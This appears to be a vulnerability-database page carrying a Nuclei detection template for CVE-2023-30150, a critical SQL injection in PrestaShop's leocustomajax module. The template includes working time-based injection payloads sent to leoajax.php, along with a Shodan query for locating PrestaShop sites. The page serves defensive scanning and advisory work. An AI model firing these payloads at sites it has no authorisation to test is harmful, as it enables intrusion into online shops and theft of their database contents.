| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2023-30150 | 14 Jun 202321:15 | – | attackerkb | |
| PrestaShop SQL注入漏洞 | 14 Jun 202300:00 | – | cnnvd | |
| CVE-2023-30150 | 14 Jun 202300:00 | – | cve | |
| CVE-2023-30150 | 14 Jun 202300:00 | – | cvelist | |
| CVE-2023-30150 | 14 Jun 202321:15 | – | nvd | |
| CVE-2023-30150 | 14 Jun 202321:15 | – | osv | |
| Sql injection | 14 Jun 202321:15 | – | prion | |
| PT-2023-22559 · Prestashop · Prestashop Leocustomajax | 14 Jun 202300:00 | – | ptsecurity | |
| CVE-2023-30150 | 23 May 202503:42 | – | redhatcve | |
| VulnCheck KEV: CVE-2023-30150 | 8 Jun 202500:00 | – | vulncheck_kev |
id: CVE-2023-30150
info:
name: PrestaShop leocustomajax 1.0 & 1.0.0 - SQL Injection
author: mastercho
severity: critical
description: |
PrestaShop leocustomajax 1.0 and 1.0.0 are vulnerable to SQL Injection via modules/leocustomajax/leoajax.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the PrestaShop application and its underlying database.
remediation: |
Apply the latest security patch or upgrade to a patched version of PrestaShop leocustomajax plugin to mitigate the SQL Injection vulnerability.
reference:
- https://security.friendsofpresta.org/module/2023/06/06/leocustomajax.html
- https://www.tenable.com/cve/CVE-2023-30150
- https://friends-of-presta.github.io/security-advisories/module/2023/06/06/leocustomajax.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-30150
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-30150
cwe-id: CWE-89
epss-score: 0.03849
epss-percentile: 0.88863
cpe: cpe:2.3:a:leotheme:leocustomajax:1.0.0:*:*:*:*:prestashop:*:*
metadata:
verified: true
max-request: 2
vendor: leotheme
product: leocustomajax
framework: prestashop
shodan-query: http.component:"Prestashop"
tags: cve,cve2023,prestashop,sqli,time-based-sqli,leotheme,vkev,vuln
variables:
random_id: "{{rand_text_numeric(13)}}"
flow: http(1) && http(2)
http:
- raw:
- |
GET /modules/leocustomajax/leocustomajax.js HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 3
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains_any(body, 'processajax', 'leoajax', 'leocustomajax.css', 'leosearch')"
condition: and
internal: true
- raw:
- |
@timeout: 20s
POST /modules/leocustomajax/leoajax.php?rand={{random_id}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Referer: {{RootURL}}
X-Requested-With: XMLHttpRequest
leoajax=1&pro_add=if(now()=sysdate()%2Csleep(6)%2C0)
- |
@timeout: 20s
GET /modules/leocustomajax/leoajax.php?cat_list=(SELECT(0)FROM(SELECT(SLEEP(6)))a) HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 3
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'duration_1>=6'
- 'contains(tolower(body_1), "pro_add")'
condition: and
- type: dsl
dsl:
- 'duration_2>=6'
- 'status_code_2 == 200'
- 'contains(content_type, "text/html")'
condition: and
# digest: 4b0a00483046022100fc22eaac62eaffef7fa28fbbd15649b970191c2af573dba20038b382aec08667022100b736bcd8fa7dfe666a782ddbf1748f03a0bed813263d56e0930dd8c8869080e5:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation